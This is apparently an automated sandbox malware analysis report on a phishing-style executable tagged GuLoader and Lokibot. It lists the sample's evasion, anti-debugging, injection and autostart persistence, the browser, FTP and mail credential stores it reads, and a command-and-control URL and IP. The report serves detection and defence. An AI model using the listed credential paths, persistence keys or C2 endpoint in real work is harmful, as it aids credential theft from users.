Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Trkvogn\TELETE.exe TID: 4356Thread sleep time: -120000s >= -30000sJump to behavior
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: wscript.exe, 00000005.00000002.815611340.0000011E358D0000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.838431357.0000023606D80000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000005.00000002.815611340.0000011E358D0000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.838431357.0000023606D80000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000005.00000002.815611340.0000011E358D0000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.838431357.0000023606D80000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000005.00000002.815611340.0000011E358D0000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.838431357.0000023606D80000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Anti Debugging:

barindex
Contains functionality to hide a thread from the debuggerShow sources
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D022B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,000000000_2_021D022B
Hides threads from debuggersShow sources
Source: C:\Users\user\Desktop\RFQ#5647201929.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\RFQ#5647201929.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeThread information set: HideFromDebuggerJump to behavior
Checks if the current process is being debuggedShow sources
Source: C:\Users\user\Trkvogn\TELETE.exeProcess queried: DebugPortJump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D2C89 LdrInitializeThunk,0_2_021D2C89
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D500D mov eax, dword ptr fs:[00000030h]0_2_021D500D
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D2858 mov eax, dword ptr fs:[00000030h]0_2_021D2858
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D1A6D mov eax, dword ptr fs:[00000030h]0_2_021D1A6D
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D52FD mov eax, dword ptr fs:[00000030h]0_2_021D52FD
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D114B mov eax, dword ptr fs:[00000030h]0_2_021D114B
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D19B8 mov eax, dword ptr fs:[00000030h]0_2_021D19B8
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D4BD7 mov eax, dword ptr fs:[00000030h]0_2_021D4BD7
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 2_2_004F2858 mov eax, dword ptr fs:[00000030h]2_2_004F2858
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 2_2_004F1A6D mov eax, dword ptr fs:[00000030h]2_2_004F1A6D
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 2_2_004F500D mov eax, dword ptr fs:[00000030h]2_2_004F500D
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 2_2_004F52FD mov eax, dword ptr fs:[00000030h]2_2_004F52FD
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 2_2_004F114B mov eax, dword ptr fs:[00000030h]2_2_004F114B
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 2_2_004F4BD7 mov eax, dword ptr fs:[00000030h]2_2_004F4BD7
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 2_2_004F19B8 mov eax, dword ptr fs:[00000030h]2_2_004F19B8
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C500D mov eax, dword ptr fs:[00000030h]3_2_021C500D
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C2858 mov eax, dword ptr fs:[00000030h]3_2_021C2858
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C1A6D mov eax, dword ptr fs:[00000030h]3_2_021C1A6D
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C52FD mov eax, dword ptr fs:[00000030h]3_2_021C52FD
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C114B mov eax, dword ptr fs:[00000030h]3_2_021C114B
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C19B8 mov eax, dword ptr fs:[00000030h]3_2_021C19B8
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C4BD7 mov eax, dword ptr fs:[00000030h]3_2_021C4BD7
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 4_2_004F1A6D mov eax, dword ptr fs:[00000030h]4_2_004F1A6D
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 4_2_004F2858 mov eax, dword ptr fs:[00000030h]4_2_004F2858
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 4_2_004F500D mov eax, dword ptr fs:[00000030h]4_2_004F500D
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 4_2_004F52FD mov eax, dword ptr fs:[00000030h]4_2_004F52FD
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 4_2_004F114B mov eax, dword ptr fs:[00000030h]4_2_004F114B
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 4_2_004F4BD7 mov eax, dword ptr fs:[00000030h]4_2_004F4BD7
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 4_2_004F19B8 mov eax, dword ptr fs:[00000030h]4_2_004F19B8
Enables debug privilegesShow sources
Source: C:\Users\user\Trkvogn\TELETE.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Users\user\Desktop\RFQ#5647201929.exeProcess created: C:\Users\user\Desktop\RFQ#5647201929.exe 'C:\Users\user\Desktop\RFQ#5647201929.exe' Jump to behavior
Source: C:\Users\user\Desktop\RFQ#5647201929.exeProcess created: C:\Users\user\Trkvogn\TELETE.exe 'C:\Users\user\Trkvogn\TELETE.exe' Jump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess created: C:\Users\user\Trkvogn\TELETE.exe 'C:\Users\user\Trkvogn\TELETE.exe' Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\Trkvogn\TELETE.exeQueries volume information: C:\ VolumeInformationJump to behavior
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\Trkvogn\TELETE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected LokibotShow sources
Source: Yara matchFile source: Process Memory Space: TELETE.exe PID: 4944, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
Source: C:\Users\user\Trkvogn\TELETE.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\Trkvogn\TELETE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\cert9.dbJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\pkcs11.txtJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\key4.dbJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Tries to harvest and steal ftp login credentialsShow sources
Source: C:\Users\user\Trkvogn\TELETE.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Users\user\Trkvogn\TELETE.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior

Remote Access Functionality:

barindex
Yara detected LokibotShow sources
Source: Yara matchFile source: Process Memory Space: TELETE.exe PID: 4944, type: MEMORY

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 218796 Sample: RFQ#5647201929.exe Startdate: 30/03/2020 Architecture: WINDOWS Score: 99 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Potential malicious icon found 2->40 42 Antivirus detection for sample 2->42 44 3 other signatures 2->44 8 RFQ#5647201929.exe 1 1 2->8         started        11 wscript.exe 2->11         started        13 wscript.exe 2->13         started        process3 signatures4 60 Creates autostart registry keys with suspicious values (likely registry only malware) 8->60 62 Hides threads from debuggers 8->62 64 Contains functionality to hide a thread from the debugger 8->64 15 RFQ#5647201929.exe 4 8->15         started        process5 file6 26 C:\Users\user\Trkvogn\TELETE.exe, PE32 15->26 dropped 28 C:\Users\user\Trkvogn\TELETE.vbs, ASCII 15->28 dropped 36 Hides threads from debuggers 15->36 19 TELETE.exe 1 15->19         started        signatures7 process8 signatures9 46 Antivirus detection for dropped file 19->46 48 Multi AV Scanner detection for dropped file 19->48 50 Hides threads from debuggers 19->50 22 TELETE.exe 61 19->22         started        process10 dnsIp11 30 94.176.239.112, 49748, 49749, 49750 unknown Lithuania 22->30 32 googlehosted.l.googleusercontent.com 216.58.207.65, 443, 49747 unknown United States 22->32 34 doc-0k-6o-docs.googleusercontent.com 22->34 52 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->52 54 Tries to steal Mail credentials (via file access) 22->54 56 Tries to harvest and steal ftp login credentials 22->56 58 2 other signatures 22->58 signatures12

Simulations

Behavior and APIs

TimeTypeDescription
05:54:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce ORDREMO C:\Users\user\Trkvogn\TELETE.vbs
05:54:33API Interceptor3x Sleep call for process: TELETE.exe modified
05:54:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce ORDREMO C:\Users\user\Trkvogn\TELETE.vbs

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
RFQ#5647201929.exe11%VirustotalBrowse
RFQ#5647201929.exe100%AviraHEUR/AGEN.1046816

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\Trkvogn\TELETE.exe100%AviraHEUR/AGEN.1046816
C:\Users\user\Trkvogn\TELETE.exe11%VirustotalBrowse

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
3.2.TELETE.exe.400000.0.unpack100%AviraHEUR/AGEN.1046816Download File
0.0.RFQ#5647201929.exe.400000.0.unpack100%AviraHEUR/AGEN.1046816Download File
3.0.TELETE.exe.400000.0.unpack100%AviraHEUR/AGEN.1046816Download File
2.0.RFQ#5647201929.exe.400000.0.unpack100%AviraHEUR/AGEN.1046816Download File
2.2.RFQ#5647201929.exe.2350000.0.unpack100%AviraTR/Dropper.GenDownload File
0.2.RFQ#5647201929.exe.400000.0.unpack100%AviraHEUR/AGEN.1046816Download File
4.0.TELETE.exe.400000.0.unpack100%AviraHEUR/AGEN.1046816Download File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pki.goog/gsr2/GTS1O1.crt00%VirustotalBrowse
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%VirustotalBrowse
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://myurl/myfile.bin0%Avira URL Cloudsafe
http://ocsp.pki.goog/gsr2020%VirustotalBrowse
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
https://pki.goog/repository/00%VirustotalBrowse
https://pki.goog/repository/00%URL Reputationsafe
http://94.176.239.112/panel02/fre.php0%Avira URL Cloudsafe
http://crl.pki.goog/GTS1O1.crl00%VirustotalBrowse
http://crl.pki.goog/GTS1O1.crl00%URL Reputationsafe
http://ocsp.pki.goog/gts1o100%VirustotalBrowse
http://ocsp.pki.goog/gts1o100%URL Reputationsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: TELETE.exe PID: 932JoeSecurity_GuLoaderYara detected GuLoaderJoe Security
    Process Memory Space: RFQ#5647201929.exe PID: 4916JoeSecurity_GuLoaderYara detected GuLoaderJoe Security
      Process Memory Space: TELETE.exe PID: 4944JoeSecurity_GuLoaderYara detected GuLoaderJoe Security
        Process Memory Space: TELETE.exe PID: 4944JoeSecurity_Lokibot_1Yara detected LokibotJoe Security
          Process Memory Space: RFQ#5647201929.exe PID: 4712JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

            Unpacked PEs

            No yara matches

            Sigma Overview

            No Sigma rule has matched

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            216.58.207.65PAYMENT TERMS.lnkGet hashmaliciousBrowse

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              googlehosted.l.googleusercontent.comCG2DjQo64E.exeGet hashmaliciousBrowse
              • 216.58.215.225
              Health-Ebook.exeGet hashmaliciousBrowse
              • 216.58.215.225
              Scanned-file452071.pdf.lnkGet hashmaliciousBrowse
              • 216.58.215.225
              nw1.exeGet hashmaliciousBrowse
              • 172.217.23.97
              4wyevtsyFK.exeGet hashmaliciousBrowse
              • 172.217.23.225
              MyHealth.exeGet hashmaliciousBrowse
              • 172.217.23.225
              dadaokr_2335_10000_1531371748511.apkGet hashmaliciousBrowse
              • 172.217.23.193
              http://www.shedemeryville.com/wp-content/uploads/2018/11/badezimmer-verputzen-statt-fliesen-wohndesign-mobel-ideen-von-badezimmer-farbe-statt-fliesen-photo.jpgGet hashmaliciousBrowse
              • 172.217.23.225
              Swift Advice.xlsxGet hashmaliciousBrowse
              • 172.217.23.225
              COVID-19 Emit Plan and Communication _18 March 2020.xlsxGet hashmaliciousBrowse
              • 172.217.23.193
              Chance.exeGet hashmaliciousBrowse
              • 172.217.23.193
              DAWOOENC LNG RFQ PACKAGEDOCUMENTS.exeGet hashmaliciousBrowse
              • 172.217.23.193
              FACTURA PENDIENTE.exeGet hashmaliciousBrowse
              • 172.217.23.225
              request.exeGet hashmaliciousBrowse
              • 172.217.23.193
              https://blacurlik.com/Get hashmaliciousBrowse
              • 172.217.23.225
              https://apblaw.digitalpigeon.com/msg/pwIPEGhvEeqLHwb4tvG4vQ/IpLh3v_o-TqKu6cKYmjxAA/file/a74077a0-686f-11ea-8b1f-06f8b6f1b8bdGet hashmaliciousBrowse
              • 172.217.23.193
